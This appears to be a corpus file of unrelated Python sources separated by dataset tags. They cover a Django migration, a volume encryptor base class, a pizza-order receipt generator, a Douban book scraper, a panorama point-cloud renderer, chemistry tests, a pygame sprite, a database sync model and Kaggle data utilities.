field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='gallerypicture',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='monster',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='photo',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
migrations.AlterField(
model_name='skill',
name='zdrojmail',
field=ddcz.models.magic.MisencodedTextField(blank=True, null=True),
),
]
|
nilq/baby-python
|
python
|
# Copyright (c) 2013 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
from oslo_log import log as logging
import six
from patron import keymgr
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class VolumeEncryptor(object):
"""Base class to support encrypted volumes.
A VolumeEncryptor provides hooks for attaching and detaching volumes, which
are called immediately prior to attaching the volume to an instance and
immediately following detaching the volume from an instance. This class
performs no actions for either hook.
"""
def __init__(self, connection_info, **kwargs):
self._key_manager = keymgr.API()
self.encryption_key_id = kwargs.get('encryption_key_id')
def _get_key(self, context):
"""Retrieves the encryption key for the specified volume.
:param: the connection information used to attach the volume
"""
return self._key_manager.get_key(context, self.encryption_key_id)
@abc.abstractmethod
def attach_volume(self, context, **kwargs):
"""Hook called immediately prior to attaching a volume to an instance.
"""
pass
@abc.abstractmethod
def detach_volume(self, **kwargs):
"""Hook called immediately after detaching a volume from an instance.
"""
pass
|
nilq/baby-python
|
python
|
from .calibration import Calibration
from .capture import Capture
from .configuration import Configuration, default_configuration
from .device import Device
from .image import Image
from .imu_sample import ImuSample
from .transformation import Transformation
|
nilq/baby-python
|
python
|
# some comment
""" doc string """
import math
import sys
class the_class():
# some comment
""" doc string """
import os
import sys
class second_class():
some_statement
import os
import sys
|
nilq/baby-python
|
python
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Pizza Project - main.py - started on 8 November 2021
# Written by Garret Stand licensed under a MIT license for academic use.
# This file contains shell formatting and other output modification/redirections functions for the program. It is a non-executable library.
# Please read the readme if you wish to execute this program locally. Developed on Python 3.9.7
import json
import sys
import os
import random
import uuid
import platform
import argparse
import fpdf
import time
import subprocess
# DEVNOTE: import all external libraries/dependencies above this line, and all internal libraries/dependencies below this line
import argparsing
import dataDriver
import orders
if __name__ == '__main__':
dir_path = os.path.dirname(os.path.realpath(__file__))
print("This is a library. This was probably ran accidentally.\nPlease execute the pizza program from the \"main.py\" program contained in the root of the project (" + dir_path + ") by running \"python3 main.py\", or open it in a text editor/IDE to see its contents and use in the program.")
exit(1)
args = argparsing.returnArgs()
if platform.system() == 'Linux' or platform.system() == 'Darwin': # color initalization for linux/macos, wont work on windows (exceprt from my python library)
red='\033[00;31m'
green='\033[00;32m'
yellow='\033[00;33m'
blue='\033[00;34m'
purple='\033[00;35m'
cyan='\033[00;36m'
lightgray='\033[00;37m'
lred='\033[01;31m'
lgreen='\033[01;32m'
lyellow='\033[01;33m'
lblue='\033[01;34m'
lpurple='\033[01;35m'
lcyan='\033[01;36m'
white='\033[01;37m'
bold='\033[01m'
dim='\033[02m'
blink='\033[05m' # not working/odd behaviour in some terminals but this is known
underlined='\033[04m'
reverse='\033[07m'
passwordhide='\033[08m'
reset='\033[0m'
errorBG='\033[41;30m'
noticeBG='\033[43;30m'
debugBG='\033[47;30m'
else:
red=''
green=''
yellow=''
blue=''
purple=''
cyan=''
lightgray=''
lred=''
lgreen=''
lyellow=''
lblue=''
lpurple=''
lcyan=''
white=''
bold=''
dim=''
blink=''
underlined=''
reverse=''
passwordhide=''
reset=''
errorBG=''
noticeBG=''
indent = u'\U00000009' # unicode tabulation charecter, for use in printing data structures in debug subroutines and raw data writes when necessary for the data driver (yes i use tabs), or other printing/layout use.
def printError(text, debug=False):
'''
Prints an error to the console with an optional debug check
'''
if debug:
print(errorBG + "[ERROR]" + reset + " " + text) if args.debugFlag else None
else:
print(errorBG + "[ERROR]" + reset + " " + text)
def printNotice(text, debug=False):
'''
Prints a warning to the console with an optional debug check
'''
if debug:
print(noticeBG + "[NOTICE]" + reset + " " + text) if args.debugFlag else None
else:
print(noticeBG + "[NOTICE]" + reset + " " + text)
def printDebug(text):
'''
Prints debug text to the console if the debug flag is set
'''
print(debugBG + "[DEBUG]" + reset + " " + text) if args.debugFlag else None
def clear():
'''
Platform agnostic screen clear
'''
os.system('cls' if os.name == 'nt' else 'clear')
def generateReceipt(order):
'''
Generates a receipt for a given order.
'''
dir_path = os.path.dirname(os.path.realpath(__file__))
configData = dataDriver.loadConfig()
header = '*'
for i in range(len(configData['parlorName'])+8):
header += '*'
header += '''*
* ''' + configData['parlorName'] + ''' *
*'''
for i in range(len(configData['parlorName'])+8):
header += '*'
header += '*'
headerLines = header.splitlines()
receipt = fpdf.FPDF()
receipt.add_page()
receipt.add_font('receiptFont', '', dir_path + '/data/receiptFont.ttf', uni=True)
receipt.set_font("receiptFont", size = 10)
for x in headerLines:
receipt.cell(200, 10, txt=x, ln=1, align='C')
receipt.cell(200, 10, txt="Pizza Receipt", ln=1, align="C")
receipt.cell(200, 10, txt="Time ordered: " + time.ctime(order["time"]), ln=1, align="C")
receipt.cell(200, 10, txt="--", ln=1, align="C")
receipt.cell(200, 10, txt="Order Items:", ln=1, align="C")
subTotal = 0
for pizza in order["pizzas"]:
price = float(0)
if order["pizzas"][pizza]["size"] == "small":
price = price + float(configData["sizeCosts"]["small"])
elif order["pizzas"][pizza]["size"] == "medium":
price = price + float(configData["sizeCosts"]["medium"])
elif order["pizzas"][pizza]["size"] == "large":
price = price + float(configData["sizeCosts"]["large"])
if len(order["pizzas"][pizza]["toppings"]) > 3:
for i in range(3):
price = price + float(configData["toppings<=3"])
for i in range(len(order["pizzas"][pizza]["toppings"]) - 3):
price = price + float(configData["toppings>=4"])
else:
for i in range(len(order["pizzas"][pizza]["toppings"])):
price = price + float(configData["toppings<=3"])
line = "Pizza " + pizza + ": " + order["pizzas"][pizza]["size"] + " pizza with " + "cheese, " + str(order["pizzas"][pizza]["toppings"])[1:len(str(order["pizzas"][pizza]["toppings"]))-1].replace("'", "") + " | $" + "{:.2f}".format(price) if order["pizzas"][pizza]["toppings"] != [''] else "Pizza " + pizza + ": " + order["pizzas"][pizza]["size"] + " pizza with cheese | $" + "{:.2f}".format(price)
receipt.cell(200, 10, txt=line, ln=1, align="L")
subTotal = subTotal + price
receipt.cell(200, 10, txt="Subtotal: $" + "{:.2f}".format(subTotal), ln=1, align="L")
tax = subTotal * float(configData["taxRate"]/100)
receipt.cell(200, 10, txt="Tax: $" + "{:.2f}".format(tax), ln=1, align="L")
total = subTotal + tax
receipt.cell(200, 10, txt="Total: $" + "{:.2f}".format(total), ln=1, align="L")
receipt.cell(200, 10, txt="--", ln=1, align="C")
if order["delivered"] == True:
price = float(configData["deliveryFee"])
receipt.cell(200, 10, txt="Delivery Fee: $" + "{:.2f}".format(price), ln=1, align="L")
if order["deliveryTip"] != None:
price = price + order["deliveryTip"]
receipt.cell(200, 10, txt="Tip: $" + "{:.2f}".format(order["deliveryTip"]), ln=1, align="L")
grandTotal = total + price
else:
receipt.cell(200, 10, txt="Delivery Fee: $0.00 (not delivery)", ln=1, align="L")
grandTotal = total
receipt.cell(200, 10, txt="Grand Total: $" + "{:.2f}".format(grandTotal), ln=1, align="L")
receipt.cell(200, 10, txt="--", ln=1, align="C")
receipt.cell(200, 10, txt="Order info:", ln=1, align="C")
receipt.cell(200, 10, txt="Name: " + order["name"], ln=1, align="L")
if order["delivered"] == True:
receipt.cell(200, 10, txt="Delivery: Yes", ln=1, align="L")
receipt.cell(200, 10, txt="Address: " + order["address"], ln=1, align="L")
else:
receipt.cell(200, 10, txt="Delivery: No", ln=1, align="L")
receipt.cell(200, 10, txt="Address: 123 Parlor St. for pickup", ln=1, align="L")
receipt.cell(200, 10, txt="--", ln=1, align="C")
receipt.cell(200, 10, txt="Thank you for your order!", ln=1, align="C")
receipt.output("receipt.pdf")
print("Receipt generated! Openining in system default PDF viewer...")
subprocess.Popen(["open receipt.pdf"], shell=True) # macOS now at the moment, time constratints :/
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
# encoding: utf-8
# 把str编码由ascii改为utf8(或gb18030)
import random
import sys
import time
import requests
from bs4 import BeautifulSoup
file_name = 'book_list.txt'
file_content = '' # 最终要写到文件里的内容
file_content += '生成时间:' + time.asctime()
headers = [
{'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0'},
{'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'},
{'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11'},
{'User-Agent': 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0)'},
{'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0'},
{'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/44.0.2403.89 Chrome/44.0.2403.89 Safari/537.36'}
]
def book_spider(book_tag):
global file_content, headers
url = "http://www.douban.com/tag/%s/book" % book_tag
source_code = requests.get(url, headers=random.choice(headers))
# just get the code, no headers or anything
plain_text = source_code.text
# BeautifulSoup objects can be sorted through easy
soup = BeautifulSoup(plain_text)
title_divide = '\n' + '--' * 30 + '\n' + '--' * 30 + '\n'
file_content += title_divide + '\t' * 4 + \
book_tag + ':' + title_divide
count = 1
# 得到书籍列表的soup对象
list_soup = soup.find('div', {'class': 'mod book-list'})
for book_info in list_soup.findAll('dd'):
print('tag: %s, count: %d' % (book_tag, count))
title = book_info.find('a', {'class': 'title'}).string.strip()
desc = book_info.find('div', {'class': 'desc'}).string.strip()
desc_list = desc.split('/')
author_info = '作者/译者: ' + '/'.join(desc_list[0:-3])
pub_info = '出版信息: ' + '/'.join(desc_list[-3:])
try:
rating = book_info.find(
'span', {'class': 'rating_nums'}).string.strip()
except AttributeError:
rating = "无"
file_content += "*%d\t《%s》\t评分:%s\n\t%s\n\t%s\n\n" % (
count, title, rating, author_info.strip(), pub_info.strip())
count += 1
def do_spider(book_lists):
for book_tag in book_lists:
book_spider(book_tag)
if __name__ == "__main__":
book_lists = ['心理学', '人物传记', '中国历史', '旅行', '生活', '科普']
do_spider(book_lists)
# 将最终结果写入文件
f = open(file_name, 'w')
f.write(file_content)
f.close()
|
nilq/baby-python
|
python
|
import numpy as np
from scipy.ndimage import map_coordinates
import open3d
from PIL import Image
from shapely.geometry import Point
from shapely.geometry.polygon import Polygon
import functools
from multiprocessing import Pool
from utils_eval import np_coor2xy, np_coory2v
def xyz_2_coorxy(xs, ys, zs, H, W):
us = np.arctan2(xs, -ys)
vs = -np.arctan(zs / np.sqrt(xs**2 + ys**2))
coorx = (us / (2 * np.pi) + 0.5) * W
coory = (vs / np.pi + 0.5) * H
return coorx, coory
def pt_in_poly(poly, pt):
return poly.contains(Point(pt))
def warp_walls(xy, floor_z, ceil_z, H, W, ppm, alpha):
all_rgba = []
all_xyz = []
for i in range(len(xy)):
next_i = (i + 1) % len(xy)
xy_a = xy[i]
xy_b = xy[next_i]
xy_w = np.sqrt(((xy_a - xy_b)**2).sum())
t_h = int(round((ceil_z - floor_z) * ppm))
t_w = int(round(xy_w * ppm))
xs = np.linspace(xy_a[0], xy_b[0], t_w)[None].repeat(t_h, 0)
ys = np.linspace(xy_a[1], xy_b[1], t_w)[None].repeat(t_h, 0)
zs = np.linspace(floor_z, ceil_z, t_h)[:, None].repeat(t_w, 1)
coorx, coory = xyz_2_coorxy(xs, ys, zs, H, W)
plane_texture = np.stack([
map_coordinates(equirect_texture[..., 0], [coory, coorx], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 1], [coory, coorx], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 2], [coory, coorx], order=1, mode='wrap'),
np.zeros([t_h, t_w]) + alpha,
], -1)
plane_xyz = np.stack([xs, ys, zs], axis=-1)
all_rgba.extend(plane_texture.reshape(-1, 4))
all_xyz.extend(plane_xyz.reshape(-1, 3))
return all_rgba, all_xyz
def warp_floor_ceiling(xy, z_floor, z_ceiling, H, W, ppm, alpha, n_thread):
min_x = xy[:, 0].min()
max_x = xy[:, 0].max()
min_y = xy[:, 1].min()
max_y = xy[:, 1].max()
t_h = int(round((max_y - min_y) * ppm))
t_w = int(round((max_x - min_x) * ppm))
xs = np.linspace(min_x, max_x, t_w)[None].repeat(t_h, 0)
ys = np.linspace(min_y, max_y, t_h)[:, None].repeat(t_w, 1)
zs_floor = np.zeros_like(xs) + z_floor
zs_ceil = np.zeros_like(xs) + z_ceiling
coorx_floor, coory_floor = xyz_2_coorxy(xs, ys, zs_floor, H, W)
coorx_ceil, coory_ceil = xyz_2_coorxy(xs, ys, zs_ceil, H, W)
floor_texture = np.stack([
map_coordinates(equirect_texture[..., 0], [coory_floor, coorx_floor], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 1], [coory_floor, coorx_floor], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 2], [coory_floor, coorx_floor], order=1, mode='wrap'),
np.zeros([t_h, t_w]) + alpha,
], -1).reshape(-1, 4)
floor_xyz = np.stack([xs, ys, zs_floor], axis=-1).reshape(-1, 3)
ceil_texture = np.stack([
map_coordinates(equirect_texture[..., 0], [coory_ceil, coorx_ceil], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 1], [coory_ceil, coorx_ceil], order=1, mode='wrap'),
map_coordinates(equirect_texture[..., 2], [coory_ceil, coorx_ceil], order=1, mode='wrap'),
np.zeros([t_h, t_w]) + alpha,
], -1).reshape(-1, 4)
ceil_xyz = np.stack([xs, ys, zs_ceil], axis=-1).reshape(-1, 3)
xy_poly = Polygon(xy)
with Pool(n_thread) as p:
sel = p.map(functools.partial(pt_in_poly, xy_poly), floor_xyz[:, :2])
return floor_texture[sel], floor_xyz[sel], ceil_texture[sel], ceil_xyz[sel]
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--img', default='assert/output_preprocess/demo_aligned_rgb.png',
help='Image texture in equirectangular format')
parser.add_argument('--layout', default='assert/output/demo_aligned_rgb_cor_id.txt',
help='Txt file containing layout corners (cor_id)')
parser.add_argument('--camera_height', default=1.6, type=float,
help='Camera height in meter (not the viewer camera)')
parser.add_argument('--ppm', default=120, type=int,
help='Points per meter')
parser.add_argument('--point_size', default=0.0025, type=int,
help='Point size')
parser.add_argument('--alpha', default=1.0, type=float,
help='Opacity of the texture')
parser.add_argument('--threads', default=10, type=int,
help='Number of threads to use')
parser.add_argument('--ignore_floor', action='store_true',
help='Skip rendering floor')
parser.add_argument('--ignore_ceiling', action='store_true',
help='Skip rendering ceiling')
args = parser.parse_args()
# Reading source (texture img, cor_id txt)
equirect_texture = np.array(Image.open(args.img)) / 255.0
with open(args.layout) as f:
cor_id = np.array([line.split() for line in f], np.float32)
# Convert cor_id to 3d xyz
N = len(cor_id) // 2
H, W = equirect_texture.shape[:2]
floor_z = -args.camera_height
floor_xy = np_coor2xy(cor_id[1::2], floor_z, W, H)
c = np.sqrt((floor_xy**2).sum(1))
v = np_coory2v(cor_id[0::2, 1], H)
ceil_z = (c * np.tan(v)).mean()
# Warp each wall
all_rgba, all_xyz = warp_walls(floor_xy, floor_z, ceil_z, H, W, args.ppm, args.alpha)
# Warp floor and ceiling
if not args.ignore_floor or not args.ignore_ceiling:
fi, fp, ci, cp = warp_floor_ceiling(floor_xy, floor_z, ceil_z, H, W,
ppm=args.ppm,
alpha=args.alpha,
n_thread=args.threads)
if not args.ignore_floor:
all_rgba.extend(fi)
all_xyz.extend(fp)
if not args.ignore_ceiling:
all_rgba.extend(ci)
all_xyz.extend(cp)
# Launch point cloud viewer
print('# of points:', len(all_rgba))
all_xyz = np.array(all_xyz)
all_rgb = np.array(all_rgba)[:, :3]
pcd = open3d.PointCloud()
pcd.points = open3d.Vector3dVector(all_xyz)
pcd.colors = open3d.Vector3dVector(all_rgb)
open3d.draw_geometries([pcd])
|
nilq/baby-python
|
python
|
import pytest
from openeye import oechem
from openff.recharge.aromaticity import AromaticityModel, AromaticityModels
from openff.recharge.utilities.openeye import smiles_to_molecule
@pytest.mark.parametrize(
"smiles",
[
"c1ccccc1", # benzene
"c1ccc2ccccc2c1", # napthelene
"c1ccc2c(c1)ccc3ccccc23", # phenanthrene
"c1ccc2c(c1)ccc3c4ccccc4ccc23", # chrysene
"c1cc2ccc3cccc4ccc(c1)c2c34", # pyrene
"c1cc2ccc3ccc4ccc5ccc6ccc1c7c2c3c4c5c67", # coronene
"Cc1ccc2cc3ccc(C)cc3cc2c1", # 2,7-Dimethylanthracene
],
)
def test_am1_bcc_aromaticity_simple(smiles):
"""Checks that the custom AM1BCC aromaticity model behaves as
expected for simple fused hydrocarbons.
"""
oe_molecule = smiles_to_molecule(smiles)
AromaticityModel.assign(oe_molecule, AromaticityModels.AM1BCC)
ring_carbons = [
atom
for atom in oe_molecule.GetAtoms()
if atom.GetAtomicNum() == 6 and oechem.OEAtomIsInRingSize(atom, 6)
]
ring_indices = {atom.GetIdx() for atom in ring_carbons}
assert all(atom.IsAromatic() for atom in ring_carbons)
assert all(
bond.IsAromatic()
for bond in oe_molecule.GetBonds()
if bond.GetBgnIdx() in ring_indices and bond.GetEndIdx() in ring_indices
)
def test_am1_bcc_aromaticity_ring_size():
"""Checks that the custom AM1BCC aromaticity model behaves as
expected fused hydrocarbons with varying ring sizes"""
oe_molecule = smiles_to_molecule("C1CC2=CC=CC3=C2C1=CC=C3")
AromaticityModel.assign(oe_molecule, AromaticityModels.AM1BCC)
atoms = {atom.GetIdx(): atom for atom in oe_molecule.GetAtoms()}
assert [not atoms[index].IsAromatic() for index in range(2)]
assert [atoms[index].IsAromatic() for index in range(2, 12)]
@pytest.mark.parametrize(
"aromaticity_model",
[AromaticityModels.AM1BCC, AromaticityModels.MDL],
)
def test_aromaticity_models(aromaticity_model):
oe_molecule = smiles_to_molecule("C")
AromaticityModel.assign(oe_molecule, aromaticity_model)
|
nilq/baby-python
|
python
|
import pygame, math, os, time
from .Torpedo import Torpedo
from .Explosion import Explosion
FRICTION_COEFF = 1 - 0.015
class Spaceship(pygame.sprite.Sprite):
def __init__(self, colour, img_path, bearing, torpedo_group, explosion_group):
super().__init__()
self.torpedo_group = torpedo_group
self.explosion_group = explosion_group
self.colour = colour
self.last_shoot = 0
self.shoot_delay = 0.9
self.raw_image = pygame.image.load(
os.path.join("assets", "spaceships", img_path)
)
self.raw_image = pygame.transform.scale(self.raw_image, (64, 64))
self.image = self.raw_image
self.rect = self.image.get_rect()
self.rect.x = 0
self.rect.y = 0
self.x_vel = 0
self.y_vel = 0
self.power = {"engines": 0, "shields": 0, "weapons": 0}
self.bearing = {"engines": bearing, "shields": 0, "weapons": 0}
self.active = {"engines": False, "shields": False, "weapons": False}
self.health = 100
def update(self):
# print("{col} health is {health}".format(col=self.colour,health=self.health))
if self.health <0 :
# print("{me} has now died".format(me=self.colour))
self.kill()
self.explosion_group.add(Explosion(self.colour, self.rect.x, self.rect.y))
return
self.bearing["engines"] = self.bearing["engines"] % 360
self.bearing["shields"] = self.bearing["shields"] % 360
self.bearing["weapons"] = self.bearing["weapons"] % 360
self.rect.x += self.x_vel
self.rect.y += self.y_vel
self.x_vel *= FRICTION_COEFF
self.y_vel *= FRICTION_COEFF
if self.active["engines"]:
self.x_vel -= (
math.sin(math.radians(self.bearing["engines"])) * self.power["engines"]
)
self.y_vel -= (
math.cos(math.radians(self.bearing["engines"])) * self.power["engines"]
)
self.image, self.rect = Spaceship.rotate(
self.raw_image, self.rect, self.bearing["engines"]
)
if (self.rect.y < 0 and self.y_vel < 0) or (
self.rect.y > 1080 - self.image.get_height() and self.y_vel > 0
):
self.y_vel = -self.y_vel
if (self.rect.x < 0 and self.x_vel < 0) or (
self.rect.x > (1920 - 378) - self.image.get_width() and self.x_vel > 0
):
self.x_vel = -self.x_vel
if self.active["weapons"] and time.time() > self.last_shoot + (self.shoot_delay/(self.power["weapons"]/65 + 0.1)):
self.shoot()
self.last_shoot = time.time()
def shoot(self):
self.torpedo_group.add(Torpedo(self.colour,self.bearing["weapons"],self.rect.x,self.rect.y,self.x_vel,self.y_vel))
@staticmethod
def rotate(image, rect, angle):
"""Rotate the image while keeping its center."""
# Rotate the original image without modifying it.
new_image = pygame.transform.rotate(image, angle)
# Get a new rect with the center of the old rect.
rect = new_image.get_rect(center=rect.center)
return new_image, rect
|
nilq/baby-python
|
python
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
from datetime import datetime
class SyncModel:
""" Implements common methods used by the models for syncing data into database.
currently following models use this: Companies, Contacts, Departments, Events,
Invoices, Projects, Users."""
def __init(self, db_params: dict, table_names: dict):
self.name = 'syncmodel'
pass
def table_name(self):
return self.table
def status(self):
return {
'database_table': self.table_name(),
'synced_entries': self.count(),
'last_modified': self.max_last_modified_timestamp()
}
def truncate_table(self):
self.postgresql_wrapper.execute(
f'TRUNCATE TABLE {self.table};'
)
def count_sql(self):
return f'SELECT COUNT(*) FROM {self.table}'
def max_last_modified_sql(self):
return f'SELECT max(updated_at) FROM {self.table}'
def max_last_modified_timestamp(self) -> datetime:
"""Returns the highest ldap_modifytimestamp"""
return self.postgresql_wrapper.execute(
self.max_last_modified_sql()
)[0][0]
def count(self) -> int:
return self.postgresql_wrapper.execute(self.count_sql())[0][0]
# customize these below methods in the classes where we want different or additional columns.
@classmethod
def create_table_sql(cls, table_name):
return f'''CREATE TABLE IF NOT EXISTS {table_name}(
id serial PRIMARY KEY,
tl_uuid uuid NOT NULL,
tl_content jsonb NOT NULL,
tl_type VARCHAR,
created_at timestamp with time zone NOT NULL DEFAULT now(),
updated_at timestamp with time zone NOT NULL DEFAULT now(),
CONSTRAINT {table_name.replace(".","_")}_constraint_key UNIQUE (tl_uuid)
);
'''
# selects a page of data from our models database table
def select_page(self, limit=0, offset=0):
return self.postgresql_wrapper.execute(
f'''
SELECT * from {self.table} ORDER BY id LIMIT %s OFFSET %s
''',
(limit, offset)
)
def upsert_entities_sql(self):
return f'''INSERT INTO {self.table} (
tl_uuid,
tl_type,
tl_content)
VALUES (%s, %s, %s) ON CONFLICT (tl_uuid) DO
UPDATE
SET tl_content = EXCLUDED.tl_content,
tl_type = EXCLUDED.tl_type,
updated_at = now();
'''
def _prepare_vars_upsert(self, teamleader_result, tl_type: str) -> tuple:
"""Transforms teamleader entry to pass to the psycopg2 execute function.
Transform it to a tuple containing the parameters to be able to upsert.
"""
return (
str(teamleader_result['id']),
tl_type,
json.dumps(teamleader_result)
)
def upsert_results(self, teamleader_results: list):
"""Upsert the teamleader entries into PostgreSQL.
Transforms and flattens the teamleader entries to one list,
in order to execute in one transaction.
Arguments:
teamleader_results -- list of Tuple[list[teamleader_entry], str].
"""
vars_list = []
for result_tuple in teamleader_results:
tl_type = result_tuple[1]
# Parse and flatten the SQL values from the ldap_results as a
# passable list
vars_list.extend(
[
self._prepare_vars_upsert(tl_result, tl_type)
for tl_result
in result_tuple[0]
]
)
self.postgresql_wrapper.executemany(
self.upsert_entities_sql(), vars_list)
# deprecated/unused
# import uuid
# def insert_entity(self, date_time: datetime = datetime.now(), content='{"key": "value"}'):
# vars = (str(uuid.uuid4()), self.name, content)
# self.postgresql_wrapper.execute(self.upsert_entities_sql(), vars)
|
nilq/baby-python
|
python
|
class InvalidBrowserException(Exception):
pass
class InvalidURLException(Exception):
pass
|
nilq/baby-python
|
python
|
import os
import time
import json
import string
import random
import itertools
from datetime import datetime
import numpy as np
import pandas as pd
from numba import jit
from sklearn.metrics import mean_squared_error
from contextlib import contextmanager, redirect_stdout
import matplotlib.pyplot as plt
N_TRAIN = 20216100
N_TEST = 41697600
# load file paths
settings = json.load(open("./settings.json"))
OUTPUT_PATH = settings["OUTPUT_PATH"]
MODEL_PATH = settings["MODEL_PATH"]
DATA_PATH = settings["DATA_PATH"]
PRIMARY_USE_GROUPINGS = [
["Education"],
["Lodging/residential"],
["Office"],
["Entertainment/public assembly"],
["Public services"],
["Other", "Retail", "Parking", "Warehouse/storage",
"Food sales and service", "Religious worship", "Utility", "Technology/science",
"Healthcare", "Manufacturing/industrial", "Services",]
]
def take_first(x): return x.values[0]
def take_last(x): return x.values[-1]
@contextmanager
def timer(name):
print(f'{datetime.now()} - [{name}] ...')
t0 = time.time()
yield
print(f'{datetime.now()} - [{name}] done in {time.time() - t0:.0f} s\n')
def make_dir(dir_name):
"""Create a directory if it doesn"t already exist"""
if not os.path.exists(dir_name):
os.makedirs(dir_name)
class Logger(object):
"""Save a string line(s) to a file."""
def __init__(self, file_path, mode="w", verbose=False):
self.file_path = file_path
self.verbose = verbose
open(file_path, mode=mode)
def append(self, line, print_line=None):
if print_line or self.verbose:
print(line)
with open(self.file_path, "a") as f:
with redirect_stdout(f):
print(line)
@jit(nopython=True)
def find_zero_streaks(x):
n = len(x)
streaks = np.zeros(n)
if x[0] == 0:
streaks[0] = 1
for i in range(1,n):
if x[i] == 0:
streaks[i] = streaks[i-1] + 1
return streaks
def find_zero_streaks_wrapper(x):
return find_zero_streaks(x.values)
@jit(nopython=True)
def find_constant_values(x, min_constant_values=6):
i = 0
j = i + 1
n = len(x)
ignore_values = np.zeros(n)
while j < n:
if x[i] == x[j]:
k = j+1
while k < n and x[i] == x[k]:
k += 1
if k-1-i > min_constant_values:
ignore_values[i+1:k] = 1
i = k
else:
i += 1
j = i + 1
return ignore_values==1
def rmsle(x,y):
x = np.log1p(x)
y = np.log1p(y)
return np.sqrt(mean_squared_error(x, y))
def plot_feature_importance(model, feature_cols):
importance_df = pd.DataFrame(
model.feature_importance(),
index=feature_cols,
columns=['importance']).sort_values('importance')
fig, ax = plt.subplots(figsize=(8, 8))
importance_df.plot.barh(ax=ax)
fig.show()
def get_validation_months(n_months):
validation_months_list = [np.arange(i+1,i+2+n_months-1)
for shift in range(n_months)
for i in range(shift,12+shift, n_months)]
validation_months_list = [(x-1) % 12 + 1 for x in validation_months_list]
return validation_months_list
def reduce_mem_usage(df, skip_cols=[], verbose=False):
""" Reduce memory usage in a pandas dataframe
Based on this great kernel:
https://www.kaggle.com/arjanso/reducing-dataframe-memory-size-by-65
"""
start_mem_usg = df.memory_usage().sum() / 1024**2
print("Memory usage of properties dataframe is :",start_mem_usg," MB")
NAlist = [] # Keeps track of columns that have missing values filled in.
for col in np.setdiff1d(df.columns, skip_cols):
if df[col].dtype != object: # Exclude strings
# print column type
if verbose:
print("******************************")
print("Column: ",col)
print("dtype before: ",df[col].dtype)
# make variables for Int, max and min
IsInt = False
mx = df[col].max()
mn = df[col].min()
if verbose:
print("min for this col: ",mn)
print("max for this col: ",mx)
# Integer does not support NA, therefore, NA needs to be filled
if not np.isfinite(df[col]).all():
NAlist.append(col)
df[col].fillna(mn-1,inplace=True)
# test if column can be converted to an integer
asint = df[col].fillna(0).astype(np.int64)
result = (df[col] - asint)
result = result.sum()
if result > -0.01 and result < 0.01:
IsInt = True
# Make Integer/unsigned Integer datatypes
if IsInt:
if mn >= 0:
if mx < 255:
df[col] = df[col].astype(np.uint8)
elif mx < 65535:
df[col] = df[col].astype(np.uint16)
elif mx < 4294967295:
df[col] = df[col].astype(np.uint32)
else:
df[col] = df[col].astype(np.uint64)
else:
if mn > np.iinfo(np.int8).min and mx < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif mn > np.iinfo(np.int16).min and mx < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif mn > np.iinfo(np.int32).min and mx < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif mn > np.iinfo(np.int64).min and mx < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
# Make float datatypes 32 bit
else:
df[col] = df[col].astype(np.float32)
if verbose:
print("dtype after: ",df[col].dtype)
print("******************************")
# Print final result
if verbose:
print("___MEMORY USAGE AFTER COMPLETION:___")
mem_usg = df.memory_usage().sum() / 1024**2
print("Memory usage is: ",mem_usg," MB")
print("This is ",100*mem_usg/start_mem_usg,"% of the initial size")
return df, NAlist
def load_data(data_name):
"""Loads and formats data"""
# raw
if data_name == "train":
return pd.read_csv(f"{DATA_PATH}/train.csv")
if data_name == "test":
return pd.read_csv(f"{DATA_PATH}/test.csv")
if data_name == "input":
return load_data("train"), load_data("test")
# clean
if data_name == "train_clean":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_clean.pkl")
if data_name == "test_clean":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_clean.pkl")
if data_name == "clean":
return load_data("train_clean"), load_data("test_clean")
# nn meter
if data_name == "train_nn_meter":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/train_nn_meter.pkl")
if data_name == "test_nn_meter":
return pd.read_pickle(f"{DATA_PATH}/preprocessed/test_nn_meter.pkl")
if data_name == "nn_meter":
return load_data("train_nn_meter"), load_data("test_nn_meter")
# nn target normalized meter
if data_name == "train_nn_target_normalized_meter":
